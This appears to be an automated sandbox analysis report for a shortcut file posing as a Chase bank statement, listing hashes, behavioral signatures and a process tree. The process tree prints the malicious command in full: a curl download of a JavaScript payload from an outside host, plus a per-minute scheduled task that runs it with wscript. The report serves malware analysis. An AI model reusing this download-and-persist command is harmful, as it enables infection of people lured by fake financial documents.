Analysis
-
max time kernel
143s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
28-05-2024 01:36
Static task
static1
Behavioral task
behavioral1
Sample
Chasebank_Statement_May.lnk
Resource
win7-20240221-en
windows7-x64
5 signatures
150 seconds
General
-
Target
Chasebank_Statement_May.lnk
-
Size
2KB
-
MD5
6bf403f2f1c9d8382fff6ed5a3041899
-
SHA1
922df103fec71861594dc918678ad6af27b14851
-
SHA256
7c8568685a386cfba733f330d0607fc54246801a6ccfc8b67c61acd11a0f695e
-
SHA512
d235396894b5c82b1a5d282959f65a00bc2dc021fbabf71746994239b14559db09c4ad3be80a9c70829df0bf197407e64a44b88989fd2d420cb98d03119463e8
Score
3/10
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
cmd.execmd.exetaskeng.exedescription pid process target process PID 2932 wrote to memory of 2600 2932 cmd.exe cmd.exe PID 2932 wrote to memory of 2600 2932 cmd.exe cmd.exe PID 2932 wrote to memory of 2600 2932 cmd.exe cmd.exe PID 2600 wrote to memory of 2868 2600 cmd.exe schtasks.exe PID 2600 wrote to memory of 2868 2600 cmd.exe schtasks.exe PID 2600 wrote to memory of 2868 2600 cmd.exe schtasks.exe PID 2620 wrote to memory of 2456 2620 taskeng.exe wscript.EXE PID 2620 wrote to memory of 2456 2620 taskeng.exe wscript.EXE PID 2620 wrote to memory of 2456 2620 taskeng.exe wscript.EXE PID 2620 wrote to memory of 1536 2620 taskeng.exe wscript.EXE PID 2620 wrote to memory of 1536 2620 taskeng.exe wscript.EXE PID 2620 wrote to memory of 1536 2620 taskeng.exe wscript.EXE PID 2620 wrote to memory of 2332 2620 taskeng.exe wscript.EXE PID 2620 wrote to memory of 2332 2620 taskeng.exe wscript.EXE PID 2620 wrote to memory of 2332 2620 taskeng.exe wscript.EXE -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Chasebank_Statement_May.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c curl -s -v -o j9KJ7gY13QnF.js "https://livingthemiraculouslife.com/assets/js/rosellateknP.php" & schtasks /create /f /sc minute /mo 1 /tr "wscript 'C:\Users\Admin\AppData\Local\Temp\j9KJ7gY13QnF.js' EhWX76T0MYGVrOQ" /tn EhWX76T0MYGVrOQ2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc minute /mo 1 /tr "wscript 'C:\Users\Admin\AppData\Local\Temp\j9KJ7gY13QnF.js' EhWX76T0MYGVrOQ" /tn EhWX76T0MYGVrOQ3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\taskeng.exetaskeng.exe {515068FE-396F-447A-A6AD-2B973298463D} S-1-5-21-2297530677-1229052932-2803917579-1000:HKULBIBU\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wscript.EXEC:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\Temp\j9KJ7gY13QnF.js" EhWX76T0MYGVrOQ2⤵
-
C:\Windows\system32\wscript.EXEC:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\Temp\j9KJ7gY13QnF.js" EhWX76T0MYGVrOQ2⤵
-
C:\Windows\system32\wscript.EXEC:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\Temp\j9KJ7gY13QnF.js" EhWX76T0MYGVrOQ2⤵